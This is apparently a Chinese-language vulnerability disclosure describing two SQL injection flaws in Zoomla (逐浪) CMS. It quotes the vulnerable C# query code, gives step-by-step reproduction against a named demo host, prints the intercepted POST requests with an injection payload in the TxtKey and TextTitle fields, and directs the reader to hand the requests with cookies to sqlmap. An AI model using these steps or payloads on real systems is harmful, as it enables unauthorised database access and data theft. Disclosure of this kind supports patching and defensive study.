逐浪CMS通用型SQL注入两枚

注入1: http://demo.zoomla.cn/mis/target/page.aspx TxtKey参数 [php] string selectedValue = this.drType.SelectedValue; string text = this.TxtKey.Text; this.dt = this.bll.Sel(string.Concat(new string[] { "ParentID=0 And Inputer='", this.buser.GetLogin().UserName, "' And type like '%", selectedValue, "%' And Title like '%", text, //没有过滤直接带入查询,导致漏洞产生 "%'" }), "ID desc"); [/php] 前台注册一个用户。 先到http://demo.zoomla.cn/mis/target/AddTarget.aspx 添加一个名为test123的目标 访问下面的链接: http://demo.zoomla.cn/mis/target/page.aspx 搜索test123 z1 抓取数据包,把test123修改为test123%’*-- [php] __VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2 [/php] 连着cookie丢到sqlmap即可: z2 z3 注入点2: http://demo.zoomla.cn/mis/addmis.aspx title参数 [php] protected void Button_Click(object sender, EventArgs e) … DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤 …[/php] 随便输入点信息: z4 点击确定,然后抓包 [php] __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID= [/php] TextTitle=aaa 存在注入 带上COOKIE丢到sqlmap即可 z5 z6

发表评论